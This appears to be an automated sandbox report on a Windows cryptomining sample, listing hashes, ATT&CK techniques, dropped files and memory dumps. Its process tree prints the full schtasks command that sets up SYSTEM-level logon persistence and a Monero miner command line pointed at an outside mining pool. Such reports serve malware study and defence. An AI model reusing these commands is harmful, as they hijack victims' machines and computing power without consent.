e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28

Analysis

max time kernel
2s
max time network
79s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
08-01-2024 09:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4b120bc4e493e86e34b1efea1a10db6c.exe
Size

64KB
MD5

4b120bc4e493e86e34b1efea1a10db6c
SHA1

25e40d98177f72e612fb2def28a6cec2af8abc00
SHA256

e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28
SHA512

a35e33ced2e68903519210e386c4251a87a65afd1d4b66346e1ebef2b1f7798823a56732869d9e363c2c28cfb1a74177ffd9caf1c09a1668b8fef4ba92d8b6fc
SSDEEP

768:FSo8zLAAVxojgGxuwmSyd2glQ6pyZCQ75v3u211ToUQH7pFMhfgJ/3bhiAMG4r8j:FJaLlOjgTLBHpyQY5WHFMF41r7frqo

Score

6^/10

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2360 schtasks.exe
2192 schtasks.exe
112 schtasks.exe
2196 schtasks.exe

pid	process
2360	schtasks.exe
2192	schtasks.exe
112	schtasks.exe
2196	schtasks.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

4b120bc4e493e86e34b1efea1a10db6c.execmd.exe

description	pid	process	target process
PID 2512 wrote to memory of 2144	2512	4b120bc4e493e86e34b1efea1a10db6c.exe	cmd.exe
PID 2512 wrote to memory of 2144	2512	4b120bc4e493e86e34b1efea1a10db6c.exe	cmd.exe
PID 2512 wrote to memory of 2144	2512	4b120bc4e493e86e34b1efea1a10db6c.exe	cmd.exe
PID 2144 wrote to memory of 2360	2144	cmd.exe	schtasks.exe
PID 2144 wrote to memory of 2360	2144	cmd.exe	schtasks.exe
PID 2144 wrote to memory of 2360	2144	cmd.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4b120bc4e493e86e34b1efea1a10db6c.exe
"C:\Users\Admin\AppData\Local\Temp\4b120bc4e493e86e34b1efea1a10db6c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2144
- C:\Users\Admin\AppData\Roaming\Services.exe
  "C:\Users\Admin\AppData\Roaming\Services.exe"
  2⤵
  PID:2764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit
    3⤵
    PID:3060
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80
    3⤵
    PID:2352
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  2⤵
  PID:2820
- - C:\Users\Admin\AppData\Roaming\Services.exe
    "C:\Users\Admin\AppData\Roaming\Services.exe"
    3⤵
    PID:2284
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit
      4⤵
      PID:1312
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80
      4⤵
      PID:812
- - C:\Users\Admin\AppData\Roaming\Services.exe
    "C:\Users\Admin\AppData\Roaming\Services.exe"
    3⤵
    PID:2056
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM" & exit
      4⤵
      PID:3008
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80
      4⤵
      PID:300

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"
1⤵
- Creates scheduled task(s)
PID:2360

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"
1⤵
- Creates scheduled task(s)
PID:2192

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"
1⤵
- Creates scheduled task(s)
PID:112

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' /RU "SYSTEM"
1⤵
- Creates scheduled task(s)
PID:2196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
1KB

MD5
7c3ce479291895a889ef574500bd160a

SHA1
5aa6588eb94042b3bcb98c7f509ae567633df9fb

SHA256
464ce867583292a3e4892526cd050276a32f2fe9267f3639c5f6072f5c7e5e48

SHA512
901dc4e9182ed8cbe8b8eabaedd2f0f739da4c35b0b4c9eac00ec846ff08146014300011d87e30e2369999856f3d0a174eb12d0d5107aa0a5d41018e6d801082

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
11KB

MD5
829b7a6460eb92243d1c2800478e1851

SHA1
d9ad0d883dfe971e0528090652d1ee3ce83d5c91

SHA256
0f6e6bdbf6e2db0b45729c91b47d69e64a0ba4023d73f7c8853f8524d21491a1

SHA512
a054aa6984de79f424263ccce7d978f6a836faaf4ac8c5d9e82fd3db5994f460fa84df284b0385bee76a9b7ad7ac4ac9f1f7b375b1ddaeb31015d8bfb7742cdc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
12KB

MD5
24ff7a763f96b93d11e47f99678620c6

SHA1
cbbae214991f923b9f62eef19bf4a2ada083f514

SHA256
2837716c122b32c14068667611fa685b0bb23450b17912de262013d2199634ba

SHA512
2c9e0303f140d7a414f34964233c61f6f05f60a877ffd050a109ed956db9d098f0dc9afa98a949487b312630b44c88941f8df65324ac1ac355ffcc70ed69c0cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.log

Filesize
1KB

MD5
56257a0efb7163f04a1b0cbb0f3b8858

SHA1
f48081a3710a0819b8bc8b824997a1db9b829ef4

SHA256
38b9bcdf608ada6b99fe41dd74822d111a26b95ce5664b71199222334a44d059

SHA512
1e3beaee2897d7cd4e5f56fb302767ce0641835db469048428a18a368e8f73757975044b9f900e46af8333c1c720122377895a4b09120eaf017e502140b6470b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.log

Filesize
31KB

MD5
0389c8b710fc8e2dd8362880d3533b3c

SHA1
99899763b6dae58f95cab5a6d56ae2484e7fd7e2

SHA256
9dac2b819e2c6a10d39e1d14bcc574733abb55881b1d5df286153e144e52ac96

SHA512
b2e2232dafa9c003fccd85c5833657d2f0bd7512c650f4d56b1ad15c6d4c8b8c3e1ef2dfa243a5fccab9aad1f13e427fdf9b0bd7f70d6dee02daf5ca496cd048

Download Submit
C:\Users\Admin\AppData\Roaming\Services.exe

Filesize
19KB

MD5
1d3c4bfb725ff6d0f0122cb71e3f2c4b

SHA1
ba06da6acc4a0559286bad861f478bd83ea2d1d3

SHA256
ba1e31256365fd5135499cbe6221f45309aa91e7acec71a9683f457e95adca9f

SHA512
1e86958b7a92328bd40387523ce09493284fa2ff5d9fbe246002a0d7512f4d2415e774bf0998bb95967bdfdb7a58cd87dbb65a8828cc75de3b569385b1ba1d65

Download Submit
C:\Users\Admin\AppData\Roaming\Services.exe

Filesize
19KB

MD5
d3e81c1312d5d62d8f8b0baaf907e02a

SHA1
27ab3eae3e3bae77b73eb01c9de971b3ce75649f

SHA256
9801e8d441a762a039b0fcc547bf6e8df408237acacdbd51453053516a103857

SHA512
ff585bb9295e7a89e746fde83976828ee3644216391fb41d1879673efed31e29c89fb7ab84c21d7a8acac275cbf4936260a2a08390ef16fa7b11c06f7afb485d

Download Submit
C:\Users\Admin\AppData\Roaming\Services.exe

Filesize
64KB

MD5
4b120bc4e493e86e34b1efea1a10db6c

SHA1
25e40d98177f72e612fb2def28a6cec2af8abc00

SHA256
e66d2dae8f47c828b769924d7bd5f08e50b18399f49dd0bc6cc6d70577972a28

SHA512
a35e33ced2e68903519210e386c4251a87a65afd1d4b66346e1ebef2b1f7798823a56732869d9e363c2c28cfb1a74177ffd9caf1c09a1668b8fef4ba92d8b6fc

Download Submit
C:\Users\Admin\AppData\Roaming\Services.exe

Filesize
1KB

MD5
ab65238f29629afd00a51db09deddc36

SHA1
6ca24803e788990d5e799eb137346da959a6a260

SHA256
ca28a9e9ea44cc77c29f881f56a9f2764a9338400c07c8f58bd0f2dd911602fa

SHA512
799a3b661633dfedae79249961475f3180345ad38e6a157f32b4cfc3f50e3693d5fe6c388cfbe122ff38eb0edec5ba719b39411319c75c7cdaf0e3de2f02f3ce

Download Submit
\Users\Admin\AppData\Roaming\Services.exe

Filesize
5KB

MD5
4ecf54592bb009fb984b11fcf2deee53

SHA1
97067be1765018e1ab9622cf9f389351c22e3ee7

SHA256
dfaa6949f7707aae21b1519664ec3329d89436d64ea65396c78c777d85bf542e

SHA512
6c50781796bcb17dac4609ae9224afdb46ae4eb9426b6034523f57f0334cec0202adfd33120c55c9b49df39e15b06c50ce3f97289aff66240f9e917eff1b4c80

Download Submit
memory/300-92-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/300-95-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/300-96-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/300-94-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/300-84-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/300-91-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/300-93-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/812-118-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/812-111-0x000007FFFFFDC000-0x000007FFFFFDD000-memory.dmp

Filesize
4KB

Download
memory/2056-89-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2056-41-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2056-37-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2056-38-0x000000001B810000-0x000000001B890000-memory.dmp

Filesize
512KB

Download
memory/2284-30-0x000000001BBF0000-0x000000001BC70000-memory.dmp

Filesize
512KB

Download
memory/2284-34-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2284-35-0x000000001BBF0000-0x000000001BC70000-memory.dmp

Filesize
512KB

Download
memory/2284-116-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2284-29-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2352-54-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-52-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-45-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-48-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-50-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-69-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-56-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/2352-58-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-62-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download
memory/2352-65-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-67-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-68-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-66-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-64-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-63-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-44-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-55-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-53-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-46-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-51-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-49-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2352-47-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2512-21-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2512-0-0x000000013F570000-0x000000013F584000-memory.dmp

Filesize
80KB

Download
memory/2512-2-0x0000000000750000-0x0000000000760000-memory.dmp

Filesize
64KB

Download
memory/2512-3-0x000000001B500000-0x000000001B580000-memory.dmp

Filesize
512KB

Download
memory/2512-1-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2764-18-0x000000013F640000-0x000000013F654000-memory.dmp

Filesize
80KB

Download
memory/2764-43-0x00000000009B0000-0x00000000009B6000-memory.dmp

Filesize
24KB

Download
memory/2764-22-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2764-23-0x000000001BB00000-0x000000001BB80000-memory.dmp

Filesize
512KB

Download
memory/2764-31-0x000000001BB00000-0x000000001BB80000-memory.dmp

Filesize
512KB

Download
memory/2764-28-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2764-60-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2820-19-0x0000000000640000-0x0000000000646000-memory.dmp

Filesize
24KB

Download
memory/2820-20-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download
memory/2820-17-0x000000013F730000-0x000000013F738000-memory.dmp

Filesize
32KB

Download
memory/2820-27-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

Filesize
9.9MB

Download